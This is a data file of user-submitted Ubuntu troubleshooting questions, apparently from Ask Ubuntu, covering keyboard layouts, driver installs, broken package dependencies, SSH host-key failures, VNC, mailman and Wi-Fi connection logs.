422648	how to automatically select the right keyboard layout ? - with only one keyboard layout	on my laptop , i only have one keyboard layout : now , if i login in to ubuntu 13.10 , and press the # key , i get \ . similar things occur for other keys - \ become < . uk layout features do n't work , as âł becomes # . but if i open the settings , or select the layout in the top bar of unity , despite it being the only layout , it does not cause the above problems . here is also the window of keyboard settings : the layout seems to show correctly ( but this is after opening keyboard settings , after which it seems alright ... . ) : i hope to find an answer myself , but i 'll see if anyone else has any ideas about this ? i have n't had this problem elsewhere ... and is a tad irritating when programming . the laptop in question is lenovo g570 with ubuntu 13.10 + fedora 20 dual boot ( i have n't had any problems in fedora ) - model 4334
422650	map altgr- [ a..z ] and shift-altgr- [ a..z ] to greek letter	i 'm on ubuntu trusty , and i use greek letters for algebra . i 'd love to be able to type them in quickly with altgr-letterkey . for example , map alpha to altgr-a , map beta to altgr-b , map theta to altgr-t , etc . this page explains how to do it on an earlier version of ubuntu . when i try following it , i can go to system settings - > keyboard - > typing - > compose key . but when i get to compose key , it says that it 's 'disabled ' . nothing happens when i click the row and hold down new keys , nor when i press backspace to clear . even if it did work , i do n't see how that would enable to me to re-assign altgr- [ a..z ] . can anyone help ?
422651	steam not letting me make new folders	i 'm trying to make a folder on my data drive for my steam games and i keep getting this '' new steam library must be on a file system mounted with execute permissions ''
422656	ca n't get rid of `` previous version of fglrx '' and installing amd 's drivers fails	i tired out the fglrx driver form additional drivers program and they were not what i thought it would be , so i downloaded the drivers from amd ... but when i run the program like this sudo ./amd-driver-installer-13.35.1005-x86.x86_64.run i get this : [ error ] a previous installation of fglrx driver detected to be loaded . user must uninstall existing fglrx driver or run install with force option . forcing the installation is not recommended . i tried to remove the driver rom additional drivers program again and tried to re-install ... still the same message , then i did : sudo apt-get remove -- purge fglrx then tried the installer again . still the same message . what do i have to do to completely get rid of fglrx ? ? ? ( p.s i did reboot after every move )
422658	replace harddrive and keep the data	i have a sata harddrive in my laptop running ubuntu v13.10 . i bought a sdd drive and want to switch the drives but keep the data . is there a way to connect the new sdd drive via an adapter to the usb interface and do a mirror of the drives ? split the mirror . take out the sata drive and insert the new sdd drive and run as nothing has happened , except faster ; ) ? what are the commands to setup the mirror and to do the split ?
422662	new to the linux . how to update firefox and install flash player add-on ?	i am new to the linux system . i was able to download the update to firefox ( i think ) , but do not know for sure how to update it . i think my system is missing something , but being new to this operating system i not sure . i was going to try installing another program to have a friend help me , but ca n't install that one either because i ca n't figure out how to install it . got this laptop from someone with it installed .
422663	hud causes firefox to lag when its window loses focus	so , i have 13.10 installed , and firefox has been slow lately . after opening preferences , whenever i click on another window then click back to firefox , it takes 5-10 seconds for anything i do to register . this has been happening both with firefox 26-28 , by the way . ( sticking with the stable branches for now . ) none of my add-ons are known to be particularly grievous offenders when it comes to performance . ( about : memory categorizes the whole batch of add-ons as taking only 31 mb of memory out of the 1gb that firefox sometimes requires . ) i dual-boot and do n't have this performance issue with firefox in windows . is there a way i can diagnose the issue ? [ update : ] i seem to be able to replicate this issue happening anytime after i open the hud in any application . does anyone have a work around besides the obvious `` do n't use hud '' ?
422667	elantech touchpad : right button or two-finger scroll	dear ubuntu community , i recently bought an asuspro pu401la laptop ( freedos , wiped by ubuntu 13.10 ) . it ships with a regular elantech touchpad , i.e . it has physical left and right buttons . i would like to use both the physical buttons and two-finger scrolling . out of the box , the touchpad was detected as a ps2 input device ( according to xinput ) , so it lacked multitouch . i updated to kernel version 3.13 , but still no multitouch . i managed to activate multitouch features using this dkms package . i can use two-finger scroll , right-bottom area click or two-finger click to substitute the right button . however , i would like to use the existing physical right button . the problem is that the package above disables the right button of my touchpad . xinput now results in the following : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=12 [ slave pointer ( 2 ) ] xinput list-props 12 yields : ... synaptics capabilities ( 589 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 ... that is , the right button is not detected anymore . i can alternate between the right button and multitouch features , but i can not have both right now . could you help please ?
422674	unable to resolve missing qt4 dependecies after installing armory and ppas for bitcoins	i 've decided to make a wallet trough armory so i can transfer bitcoins to cold storage , so i went to install armory . now , armory installed all well and good and than asked me to install ppas , which i followed the install procedure . then i got an error . i was saying that qt4 based programs are needed along with python-qt4 for armory , the dependencies . now i tried this to resolve them : sudo apt-get check this is what i get : lipovi @ lipovi : ~ $ sudo apt-get check [ sudo ] password for lipovi : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-designer : depends : libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-xml ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-dev : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-help ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-scripttools ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-test ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.4 is installed libqt4-help : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-qt3support : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.4 is installed libqt4-scripttools : depends : libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-test : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.6 is installed e : unmet dependencies . try using -f. then i tried this : sudo apt-get -f install this is what it prints out : lipovi @ lipovi : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqt4-designer libqt4-help libqt4-scripttools libqt4-test the following packages will be upgraded : libqt4-designer libqt4-help libqt4-scripttools libqt4-test 4 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 6 not fully installed or removed . need to get 0 b/4,155 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libqt4-designer : libqt4-designer depends on libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-script on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqt4-xml ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-xml on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-designer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqt4-network ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-network on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-sql on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : libqt4-scripttools depends on libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-script on system isno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . 4:4.8.1-0ubuntu4.6 . libqt4-scripttools depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-scripttools depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-scripttools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-test : libqt4-test depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-test ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-qt4 : python-qt4 depends on libqt4-designer ( > = 4:4.8.0-1~ ) ; however : package libqt4-designer is not configured yet . python-qt4 depends on libqt4-help ( > = 4:4.8.0-1~ ) ; however : package libqt4-help is not configured yet . python-qt4 depends on libqt4-scripttools ( > = 4:4.8.0-1~ ) ; however : package libqt4-scripttools is not configured yet . python-qt4 depends on libqt4-test ( > = 4:4.8.0-1~ ) ; however : package libqt4-test is not configured yet . dpkg : error processing python-qt4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of armory : armory depends on python-qt4 ; however : package python-qt4 is not configured yet . dpkg : error processing armory ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqt4-designer libqt4-help libqt4-scripttools libqt4-test python-qt4 armory e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and after the previous command , this : sudo apt-get install -f it prints almost the same thing . i tried too : sudo dpkg -- configure -a the print out is this : lipovi @ lipovi : ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libqt4-designer : libqt4-designer depends on libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-script on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqt4-xml ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-xml on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-designer depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-designer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqt4-network ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-network on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-sql on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-help depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : libqt4-scripttools depends on libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqt4-script on system is 4:4.8.1-0ubuntu4.6 . libqt4-scripttools depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-scripttools depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-scripttools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-qt4 : python-qt4 depends on libqt4-designer ( > = 4:4.8.0-1~ ) ; however : package libqt4-designer is not configured yet . python-qt4 depends on libqt4-help ( > = 4:4.8.0-1~ ) ; however : package libqt4-help is not configured yet . python-qt4 depends on libqt4-scripttools ( > = 4:4.8.0-1~ ) ; however : package libqt4-scripttools is not configured yet . dpkg : error processing python-qt4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-test : libqt4-test depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-test ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of armory : armory depends on python-qt4 ; however : package python-qt4 is not configured yet . dpkg : error processing armory ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqt4-designer libqt4-help libqt4-scripttools python-qt4 libqt4-test armory whatever i do , it wo n't resolve it . now , i would really nicely ask if someone had this problem and , by chance , offer a solution , i 'd be really grateful . the coins are on my phone i would like to move them as soon as possible from it . p.s . do n't ask for them ... ...
422675	using bind9 as a caching server , is there a way to set the expiration of the cached items/names ?	my bind9 is currently running fine but is there a way to set the expiration time/date of the cached names ? if so , how ? thanks in advance guys
422679	my laptop is a hp4540s , what is the version support for my laptop ? i need to install both , windows8 and ubuntu	when i try to install ubuntu 13.04 i ca n't see my partition ( s ) , i would choose to select , to install ubuntu on . why is this and what can i do ?
422680	how can i get awesome wm to display gnome wallpapers on tags 2-9 ?	for some reason , the awesome wm has stopped displaying backgrounds ( wallpapers ) on workspaces ( tags ) 2-9 . it did n't used to do this , but has started doing this for some reason on the default configuration , using the stock config file .
422684	blank screen when trying to connect to vnc	i 've installed on my vps machine vnc-gnome to remote access the graphical system so i 've my ubuntu ( v 13.10 ) and i did this steps but i 'm getting blank screen every time i 'm trying to login this is the steps that i 've followed first i did install the ubuntu desktop after update sudo apt-get update audo apt-get install ubuntu-desktop then i installed gdm and when tells me to choose between gdm and lightgdm i choose gdm sudo apt-get install gdm sudo /etc/init.d/gdm start sudo dpkg-reconfigure xserver-xorg then i installed tightvnc sudo apt-get install tightvncserver then i started vnc server with creating a password vncserver :1 -geometry 1024ă768 -depth 16 -pixelformat rgb565 then i turned it off to configure the xstartup file vncserver -kill :1 sudo nano ~/.vnc/xstartup then i added this line in the bottom of the file gnome-session & then i restarted the vps sudo reboot and then i started the vnc server vncserver :1 -geometry 1024ă768 -depth 16 -pixelformat rgb565 and i downloaded the tightvnc and connected the vps and i 'm getting this http : //i.imgur.com/ddfs51v.png
422686	sony vaio vpceb1z1e ubuntu 13.10 fan control	i 'm searching for a way , to manage the laptops fan speed . it seems that it constantly runs at the same speed , so when i try for example playing games that put some stress on my computer , i can see graphic artifacts . i 've seen this link how to control fan speed ? and tried to install things how i 'm supposed to , but unfortunately , my laptop does n't have any `` pwm-capable sensor modules installed '' .
422689	mailman web interface not working	i 'm configuring an ubuntu server 13.10 box for mailman use . i followed the howto on ubuntu help with no luck . mailman works , running the newlist command creates the list and i 'm able to get the welcome email . the web interface does not work . accessing to it shows 403 forbidden error . apache2 ( 2.4 version ) error log shows : ah01630 : client denied by server configuration : /usr/lib/cgi-bin/mailman/admin trying to debug it i saw that with apache 2.4 the allow from all directive should be changed into require all granted . doing so does not solve the error but change the error as : ah01797 : client denied by server configuration : /usr/lib/cgi-bin/mailman/ i 'm stuck here . i can not figure out where the problem is . for sure is something related to the security execution of cgi , but where ? this is the content of mailman.conf into apache sites : scriptalias /cgi-bin/mailman/ /usr/lib/cgi-bin/mailman/ alias /pipermail/ /var/lib/mailman/archives/public/ alias /images/mailman/ /usr/share/images/mailman/ < directory /usr/lib/cgi-bin/mailman/ > allowoverride none options execcgi addhandler cgi-script .cgi order allow , deny require all granted < /directory > < directory /var/lib/mailman/archives/public/ > options followsymlinks allowoverride none order allow , deny require all granted < /directory > < directory /usr/share/images/mailman/ > allowoverride none order allow , deny require all granted < /directory > thanks .
422691	how can i install ubuntu on virtualbox ? i insert the iso file , then i start the vbox , and then i get a battery and then i get a message	when i try to install ubuntu on vbox , it shows an error that says to use x86-64 kernel but i already have one .
422692	xdg-open does n't work in emacs ( org mode )	in emacs ( emacs24/xfce/saucy ) , when i click a link to a local file or export- & -open a pdf or html file , xdg-open is called with the target file . on my laptop system ( emacs24/xfce/saucy ) , it uses evince . the xdg-open variant does n't work ( but nor error is given , and xdg-open from the command line is fine ) , evince works . what 's baffling is why these things work differently in the first place . i have not added anything that would change this behaviour to my .emacs . in fact , how can i set the default application with which emacs opens a file ? there 's a related thread here , but it appears to be a developer list , and i could n't extract information how to change this behaviour in an easy way .
422696	package is in a very bad inconsistent state	i have ubuntu 13.10 on my desktop.i wanted to install the `` d-link dwr-730 '' 3g modem drivers , but the default autoplay software for ubuntu says `` kernel not supported '' for this . i ran the dpkg -i command to install the .dep files manually , but after this every apt-get command returns an error and tells me to run apt-get -f install to correct this . i ran apt-get -f install , but it still returns an error , and i ca n't install anything from apt-get . the apt-get error is as follows : errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i ran apt-get remove flashplugin-installer , but that also returns an error . sudo apt-get -f install gives the following output : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 1 not fully installed or removed . need to get 0 b/7,008 b of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing flashplugin-installer ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
422702	mount external devices into home with specialised folder icons	i wish to mount separate 3tb drives as /home/markrich/pictures , /home/markrich/music and /home/markrich/videos . mounting the drives is n't a problem for me , however is ubuntu clever enough to assign the current default folder icons to these new mounted drives with the music symbol , polaroids and film strips upon them or will they end up generic with a disc icon upon them ? if the later , how can i amend ?
422704	how to install windows 8/8.1 themes on ubuntu ?	i found this link and this one that shows that win 8 theme could be implemented ! i could it even make it faster and 100 % compatible to ambiance . my question is the following : we all know that microsoft win 8/8.1 themes are often only a pack of pictures and an colorization value ! packed in zip . the colorization color could be easily converted to rgba ! could someone tell me how to create an script to add/merge two rgba values . regards
422706	openssh_5.9p1 client wo n't add new connection ?	i 'm running an ubuntu 12.04 ssh server/client to send files to vendors we work with . recently i tried to add a new vendor by sending them my id_rsa.pub file , but could not connect . i 've been testing this out locally and i 've found that my ssh client will not connect to any new servers . the ssh client never presents the standard question i.e . the authenticity of host x.x.x.x ... ... ... are you sure you want to continue connecting ( yes/no ) . i have tried connecting to three local server all with the same negative result . all other clients can connect to these same three servers fine . i can not connect to these servers unless i export my id_rsa.pub to their authorized_keys if i place my public key on these servers it still fails with host key verification failed never asking for a pass phrase . my work around is ssh -o stricthostkeychecking=no user @ server . only after i have exported my id_rsa.pub to the remote authorized_keys . the question then is why am i never asked to add a new key to 'known_hosts ' and why must i export the public key to connect ? i 've reinstalled the ssh client , no change . cleared the known_hosts file with ssh-keygen -r x.x.x.x . deleted the known_hosts file . cleared keychain : ran eval `` $ ( ssh-agent ) '' , ssh-add -d , and ssh-add . for known_hosts permissions i 've tried 600 and 644 . thanks netmgr @ ftp-inside : ~/.ssh $ ssh -vvv sfhftp @ 10.20.11.11 openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 10.20.11.11 [ 10.20.11.11 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/netmgr/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/netmgr/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/netmgr/.ssh/id_rsa-cert type -1 debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/netmgr/.ssh/id_dsa '' as a rsa1 public key debug1 : identity file /home/netmgr/.ssh/id_dsa type 2 debug1 : checking blacklist file /usr/share/ssh/blacklist.dsa-1024 debug1 : checking blacklist file /etc/ssh/blacklist.dsa-1024 debug1 : identity file /home/netmgr/.ssh/id_dsa-cert type -1 debug1 : identity file /home/netmgr/.ssh/id_ecdsa type -1 debug1 : identity file /home/netmgr/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_4.3 debug1 : match : openssh_4.3 pat openssh_4* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 10.20.11.11 '' from file `` /home/netmgr/.ssh/known_hosts '' debug3 : load_hostkeys : loaded 0 keys debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 110/256 debug2 : bits set : 496/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa a3:03:06:34:55:04 : b8:71:8f : b7:65 : cc:43 : a5:58:43 debug3 : load_hostkeys : loading entries for host `` 10.20.11.11 '' from file `` /home/netmgr/.ssh/known_hosts '' debug3 : load_hostkeys : loaded 0 keys host key verification failed .
422708	how to show some files at the top of the list in ubuntu	i want to name a folder so that it is displayed at top ( first place ) in files ( file manager ) if the folders are sorted alphabetically by name . with what to prefix the folder name in ubuntu so that my folder is displayed at the top of the list in files ?
422711	ubuntu 12.04 lag	ubuntu lags , more time consumed to the starting screen , now i see no starting screen at all , the pdf viewer of firefox is extremely slow and laggy . in the latest update even the mouse did n't respond , firefox never opened , shut down button did nothing and i had to shut it down manually . what happened ? why my system is n't responsive ?
422714	can not connect using wpa_supplicant	i have set up a usb wifi dongle ( ralink 148f:7601 ) and now i want to connect with it to my router . i am using the following commands : $ wpa_passphrase `` ssid '' `` password '' then copy the psk i get to my config file : ap_scan=1 network= { ssid= '' ssid '' scan_ssid=1 proto=wpa2 key_mgmt=wpa-psk pairwise=ccmp tkip group=ccmp tkip psk=xxxxxxxx84f5ca1f640b21323682d51b7e880318e2da8813a6d4e9c8xxxxxxxx priority=5 } and then wpa_supplicant $ sudo wpa_supplicant -dwext -ira0 -c ~/wpaconfig2 -d i get the following log/errors http : //paste.ubuntu.com/6955478/ can someone direct me what am i doing wrong ? edit2 i changed settings on the router to accept both wpa-psk and wpa2-psk and now i have the following ; and now i have the following log http : //paste.ubuntu.com/6956230/ passing to the associated phase ra0 : event associnfo ( 4 ) received [ 25/1968 ] ra0 : association info event req_ies - hexdump ( len=46 ) : 00 0a 4e 4f 5f 54 4f 5f 41 43 54 41 01 08 82 84 8b 96 0c 12 18 24 dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 wpa : set own wpa/rsn ie - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : ra0 : event assoc ( 0 ) received ra0 : state : associating - > associated wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 ra0 : associated to a new bss : bssid=00:27:19 : d0 : xx : xx ra0 : no keys have been configured - skip key clearing ra0 : associated with 00:27:19 : d0 : xx : xx ra0 : wpa : association event - clear replay counter ra0 : wpa : clear old ptk eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized eapol : external notification - portenabled=1 eapol : supp_pae entering state connecting eapol : enable timer tick eapol : supp_be entering state idle ra0 : setting authentication timeout : 10 sec 0 usec ra0 : cancelling scan request rtm_newlink : operstate=0 ifi_flags=0x11003 ( [ up ] [ lower_up ] ) rtm_newlink , ifla_ifname : interface 'ra0 ' added wext : if_removed already cleared - ignore event wireless event : cmd=0x8b15 len=20 wireless event : new ap : 00:00:00:00:00:00 ra0 : event disassoc ( 1 ) received ra0 : disassociation notification ra0 : wpa : auto connect enabled : try to reconnect ( wps=0 ) ra0 : setting scan request : 0 sec 100000 usec added bssid 00:27:19 : d0 : xx : xx into blacklist ra0 : not rescheduling scan to ensure that specific ssid scans occur ra0 : ctrl-event-disconnected bssid=00:27:19 : d0 : xx : xx reason=0 ra0 : disconnect event - remove keys wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=4 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=5 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=0 